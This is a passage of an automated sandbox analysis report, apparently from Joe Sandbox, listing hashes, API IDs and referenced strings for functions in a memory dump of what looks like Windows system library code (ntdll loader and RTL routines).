                                                  • Instruction Fuzzy Hash: A1911E71A14751EBE712EF25CC81F2AB7A5AFC4684F000469E9809F6A1DF34EC45CBE2
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36DBA121
                                                  • Failed to allocated memory for shimmed module list, xrefs: 36DBA10F
                                                  • LdrpCheckModule, xrefs: 36DBA117
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-161242083
                                                  • Opcode ID: 5f3f728ac899fcfb572f4559cc085fb6f7e3396e706979a94888758f5d336688
                                                  • Instruction ID: 60105d90a088a5ff8ea86231d7f065da9080ba3356d8bb0866b6dc746206180c
                                                  • Opcode Fuzzy Hash: 5f3f728ac899fcfb572f4559cc085fb6f7e3396e706979a94888758f5d336688
                                                  • Instruction Fuzzy Hash: B271DFB4E00205DFEB05DF69CD80AAEBBF5EF48304F184069D542EB284E734E946CB62
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $File
                                                  • API String ID: 3446177414-2412145507
                                                  • Opcode ID: c790b4645baaa8bb29d44c9c4772d6357360d208f637e3345ab8514ac4a74c14
                                                  • Instruction ID: 7f786f2c7177b17b30681a67b856e530fa34c9abe3ba59f22733422cc1f568e7
                                                  • Opcode Fuzzy Hash: c790b4645baaa8bb29d44c9c4772d6357360d208f637e3345ab8514ac4a74c14
                                                  • Instruction Fuzzy Hash: D2618E71A1022CAFEB669B25CC41BEA77F9AB48704F4441A9E509E6181DA709F88CF64
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36DC82E8
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 36DC82DE
                                                  • Failed to reallocate the system dirs string !, xrefs: 36DC82D7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1783798831
                                                  • Opcode ID: 40a96ccc3bb7ae88393be20baa340bb7f3f76d466c3c6aaf7e8972919234b73d
                                                  • Instruction ID: ac16a913122b1979159fe19ba80d2a2d066a05d298eea647e4d463ce6cb35954
                                                  • Opcode Fuzzy Hash: 40a96ccc3bb7ae88393be20baa340bb7f3f76d466c3c6aaf7e8972919234b73d
                                                  • Instruction Fuzzy Hash: 764123B5916304EBD721DB35CC44F4B7BE8EF44650F40452AFA44E7250EB34D80ACBA6
                                                  Strings
                                                  • RTL: Resource at %p, xrefs: 36DC7B8E
                                                  • RTL: Re-Waiting, xrefs: 36DC7BAC
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 36DC7B7F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 0-871070163
                                                  • Opcode ID: 7dce71ba99997e1ff1af330c256152186fa26136aff3e2507f7eb85dbb6a34f3
                                                  • Instruction ID: 0f66feedf72f8244c92ecfc53bfb14a1c7e6a9c2716acb3fde84df95e8a456f6
                                                  • Opcode Fuzzy Hash: 7dce71ba99997e1ff1af330c256152186fa26136aff3e2507f7eb85dbb6a34f3
                                                  • Instruction Fuzzy Hash: 4841BD79B057029FE721CB25CC44B5ABBF5EF98714F100A1DE8A99B280DB21E405CB91
                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 36DC728C
                                                  Strings
                                                  • RTL: Resource at %p, xrefs: 36DC72A3
                                                  • RTL: Re-Waiting, xrefs: 36DC72C1
                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 36DC7294
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-605551621
                                                  • Opcode ID: 41123125d0cdfb54aba32ddbbc33973cefdeb55c9a8c9a832fd7b2c75a83bb93
                                                  • Instruction ID: d3a2d32131b7e55e9a337f5c23a45037897220eacb52d394ad37f449d49560aa
                                                  • Opcode Fuzzy Hash: 41123125d0cdfb54aba32ddbbc33973cefdeb55c9a8c9a832fd7b2c75a83bb93
                                                  • Instruction Fuzzy Hash: 6A41F075A00316AFE720CF25CC45B56BBB5FF88758F240619F8A4EB240DB20E806CBE1
                                                  Strings
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 36DD4899
                                                  • LdrpCheckRedirection, xrefs: 36DD488F
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36DD4888
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 3446177414-3154609507
                                                  • Opcode ID: 142b79a8e5b671fa74a630d8f83c6d11e5df97e17f3953b1b67fd48df4ccc61c
                                                  • Instruction ID: 4788e04af0d1005ee3dc50894c5e2c4d5f5d3d30b5ba2da2fcb896a814c298b8
                                                  • Opcode Fuzzy Hash: 142b79a8e5b671fa74a630d8f83c6d11e5df97e17f3953b1b67fd48df4ccc61c
                                                  • Instruction Fuzzy Hash: 0841AD76E15360EFDB11EF69C840A16BBE9AF89690F010569ED98E7351D730E804CBE1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  • Opcode ID: 117fa8035077f66ff5911ac07bbe5438611ba0a336f54484b304f938355ba24f
                                                  • Instruction ID: 3f9f17b0a9920003312ff653456dc79c27f8e3cc8ddedfb9619d70b1fe881a88
                                                  • Opcode Fuzzy Hash: 117fa8035077f66ff5911ac07bbe5438611ba0a336f54484b304f938355ba24f
                                                  • Instruction Fuzzy Hash: 8A318676900219AFDB10DF2ACC44BEEB7F8EB44754F904555E849E3240EB34DA49CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Wow64 Emulation Layer
                                                  • API String ID: 3446177414-921169906
                                                  • Opcode ID: 4223a5aa1c043bd7df7437d52c680808e5200226cd974e6202692e673d82258c
                                                  • Instruction ID: a829aedfdf454d37537c594b3e13be9c5415e2ca20b3b45a864b8abff70c7378
                                                  • Opcode Fuzzy Hash: 4223a5aa1c043bd7df7437d52c680808e5200226cd974e6202692e673d82258c
                                                  • Instruction Fuzzy Hash: 7B21367690111DBFAF01AAA28C84CBF7F7DEF45298B414464FA01A6200EA34DE0ADB30
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: c5b20a6015e2f26eb13a7b6789df54091136e2538e2e647e2d1b8ed6eaa02afd
                                                  • Instruction ID: ac4462c276c9d39a67474ec10654d7ba4050f089d81e0346c39462ae2afb6e6f
                                                  • Opcode Fuzzy Hash: c5b20a6015e2f26eb13a7b6789df54091136e2538e2e647e2d1b8ed6eaa02afd
                                                  • Instruction Fuzzy Hash: 93E16271E00309AFEF15DFA5C845BEEBBB5BF48354F24812AE515EB280E7709949CB50
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 183c133dc8ee99217d999308f436fa8347baa7adfde4f52d43aba0c589a14173
                                                  • Instruction ID: c67d71aa831411625b469fd2f29f4c247b6941c4b42b23092509d44fa2ce457b
                                                  • Opcode Fuzzy Hash: 183c133dc8ee99217d999308f436fa8347baa7adfde4f52d43aba0c589a14173
                                                  • Instruction Fuzzy Hash: AFE102B5D00718DFEB21CFAAC980A9DFBF1BF48314F20452AE955AB660D770A845CF52
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 02b4fc19769540c1eee644a7e188ecca220967d7d44f7a83a69323d20bc7e80d
                                                  • Instruction ID: fd5277f3bf44643dbca4fa11a3ce80263258b07c4ef171853dd4aa63d3c8b221
                                                  • Opcode Fuzzy Hash: 02b4fc19769540c1eee644a7e188ecca220967d7d44f7a83a69323d20bc7e80d
                                                  • Instruction Fuzzy Hash: 927104B1E0021D9FDF05CFA9D980ADDBBB5BF48354F15412AEA05BB258D734A905CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: e03e0146cafaba78d49adc87959a00a655c1248c6f55da4b0c7e27ba86d1f5e2
                                                  • Instruction ID: ee70dd75ee3a9c2122ab3eb5afbe50e1efb7e4180f00aca733e6a39dac10f88c
                                                  • Opcode Fuzzy Hash: e03e0146cafaba78d49adc87959a00a655c1248c6f55da4b0c7e27ba86d1f5e2
                                                  • Instruction Fuzzy Hash: 6C517D74B50A229FEB08EE5DC4A0A1A77F3BB49358B25406DD906D7710DBB4EC49CB80
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 4dce5fd3c465b3323591dff6bdc128bd81ca8f72dd6ab08ae8bbd8246e003376
                                                  • Instruction ID: 647fb69a9e5f2d6bd6e4b1380fbbf9f4d60638c81142503738162790d4f7c9ba
                                                  • Opcode Fuzzy Hash: 4dce5fd3c465b3323591dff6bdc128bd81ca8f72dd6ab08ae8bbd8246e003376
                                                  • Instruction Fuzzy Hash: 635132B6E0021DAFEF05CFA9C840ADDBBB6BF48354F15812AE905BB258D7349905CF60
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                  • String ID:
                                                  • API String ID: 4281723722-0
                                                  • Opcode ID: 0edf035cb2fc1209e970d41fd1f0b0bc34632f601c9158b55c4a5671ceb74aef
                                                  • Instruction ID: 76896d5c15aeb479b8bb585195b2f267f11d7415f6280cb90b65bc3c09da0a1e
                                                  • Opcode Fuzzy Hash: 0edf035cb2fc1209e970d41fd1f0b0bc34632f601c9158b55c4a5671ceb74aef
                                                  • Instruction Fuzzy Hash: C7312475E05228AFCF05DFA8C844A9EBBF1BB48724F10412AE511F7290DB359906CF64
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 4565e3b9f2c861d8e57e0549d9cfd39b11c1539cabee76aa4947017010f331d1
                                                  • Instruction ID: 69a8d2609156deed3ddfdb762573ea6c0866a75b36eca659c8b1126013ccf42f
                                                  • Opcode Fuzzy Hash: 4565e3b9f2c861d8e57e0549d9cfd39b11c1539cabee76aa4947017010f331d1
                                                  • Instruction Fuzzy Hash: EC323674D04369DFEF22CF65C844BDDBBB0AB08308F1141EAD649A7A51DB746A84CF91
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                  • Instruction ID: e69a7b3ae4b629c4a646c3a70dc3ead732eb14e8e6ed77f1c25a9187fc3e1869
                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                  • Instruction Fuzzy Hash: F991A474E002169FEB14DF6AC8856EEB7F5FF84769F60451AE854E72C0EB309940C761
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$Flst
                                                  • API String ID: 0-758220159
                                                  • Opcode ID: 4a8ed28feaf5ae890b153a34ecd37a81f10e7de497d30137385dca1ad106894a
                                                  • Instruction ID: 987fe2a722ed9587fb816110694fd2745c38a0fe6d56707671e850e7056d61e5
                                                  • Opcode Fuzzy Hash: 4a8ed28feaf5ae890b153a34ecd37a81f10e7de497d30137385dca1ad106894a
                                                  • Instruction Fuzzy Hash: 23519EB5E102588FEB15CF95C88865DFBF4EF84398F26802AD0499F650EB709946CBA0
                                                  APIs
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36D5063D
                                                  • kLsE, xrefs: 36D50540
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 3446177414-2547482624
                                                  • Opcode ID: 5188c6797699399bb4c09b51b902e3a06a201945fdab306fd468884c7d936ce9
                                                  • Instruction ID: f7629a2b297ce7262c1d6edfdacd4109063b1e4ba533a5840befb58542449c24
                                                  • Opcode Fuzzy Hash: 5188c6797699399bb4c09b51b902e3a06a201945fdab306fd468884c7d936ce9
                                                  • Instruction Fuzzy Hash: AD51C0B59147429FDB14DF25D5406A7B7E4AF84304F11483EEA9A87A40E730D586CFE2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 0$0
                                                  • API String ID: 3446177414-203156872
                                                  • Opcode ID: 07ef34247bd899df9ccdd334e806e3507d7f6150ec631832c6a4f73ee25999be
                                                  • Instruction ID: 6c2605d913449f438ce1f50824105cbca1508f9fe95732b0015d83698c53c27d
                                                  • Opcode Fuzzy Hash: 07ef34247bd899df9ccdd334e806e3507d7f6150ec631832c6a4f73ee25999be
                                                  • Instruction Fuzzy Hash: A44180B1A087459FD311CF29C544A5ABBE4FF88318F044A2EF588DB340DB71E905CB96